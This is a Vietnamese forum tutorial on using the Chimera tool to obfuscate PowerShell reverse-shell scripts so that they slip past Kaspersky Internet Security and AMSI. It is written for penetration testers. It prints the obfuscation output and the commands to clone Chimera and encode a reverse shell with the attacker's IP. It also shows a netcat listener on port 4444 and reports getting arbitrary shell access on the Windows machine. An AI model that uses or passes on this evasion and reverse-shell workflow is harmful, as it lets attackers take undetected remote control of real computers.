Vượt qua phần mềm diệt virus Kaspersky Internet Security với công cụ Chimera

DDos

VIP Members
22/10/2013
524
2.189 bài viết
Vượt qua phần mềm diệt virus Kaspersky Internet Security với công cụ Chimera
Chimera là một tập lệnh làm rối mã PowerShell được thiết kế để vượt qua AMSI và các giải pháp chống vi-rút. Nó xử lý các đoạn mã powershell độc hại và sử dụng thay thế chuỗi và nối các biến để tránh sự phát hiện của các công cụ phát hiện dựa trên chữ ký.

Exploitation.png

Chimera sẽ thực hiện rất nhiều các kỹ thuật làm rối mã khác nhau để đạt được mục đích vượt qua phần mềm diệt virus. Ví dụ hàm transformer sẽ tách các chuỗi thành nhiều đoạn và cấu trúc lại chúng dưới dạng các biến mới. Ví dụ các ký tự đầu vào của hàm này là ... New-Object System.Net.Sockets.TCPClient ..., thì ký tự đầu ra sẽ là:

Mã:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

Ở cấp độ cao hơn, hàm sẽ phân tách các chuỗi và kiểu dữ liệu thành các phần khác nhau. Kết quả hàm sẽ trả về là:

Mã:
$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

1.png

Cách sử dụng Chimera

1. Tải về bằng cách sử dụng lệnh:

Mã:
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera
sudo chmod +x chimera.sh

2. Hiển thị các tham số của công cụ:
./chimera.sh --help


2.png

3. Trong thư mục shells, có tất cả 9 loại shell khác nhau. Bạn có thể chọn bất kỳ tệp .ps1 nào để sử dụng cho mục đích thử nghiệm thâm nhập

3.png

Có một điều chắc chắn các tệp này sẽ bị xóa nếu bạn đặt một trong số script này vào máy tính chạy Windows có sử dụng phần mềm diệt virus. Bởi đây đều là các tệp độc hại.

Ví dụ, Kaspersky Internet Security đã xóa tệp generic1.ps1 ngay lập tức khi bạn copy vào hệ thống Windows

4.png

4. Bạn cần thay đổi địa chỉ IP của bạn trong tệp generic1.ps1 và cổng bạn mong muốn, để mã hóa tệp lệnh Powershell này, mình dùng lệnh:

Mã:
./chimera.sh -f shells/generic1.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

chimera sẽ tự động chạy, sử dụng các kỹ thuật khác nhau, và tệp cuối cùng nhận được là chimera.ps1.

5.png

5. Khi copy tệp chimera.ps1 vào máy tính Windows, Kaspersky Internet Security không hề phát hiện được.

6.png

6. Trên Kali Linux, mình chạy lệnh: nc -lnvp 4444 để chờ kết nối

7.png

7. Trên máy Windows, chạy chimera.ps1, lúc này, trên Kali Linux, bạn có thể chạy các lệnh shell tùy ý.

8.png
 
Chỉnh sửa lần cuối bởi người điều hành:
Hữu ích đó bác
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: WhiteHat Team
Comment
Thẻ
chimera diệt virus kaspersky kaspersky internet security tool chimera
Bên trên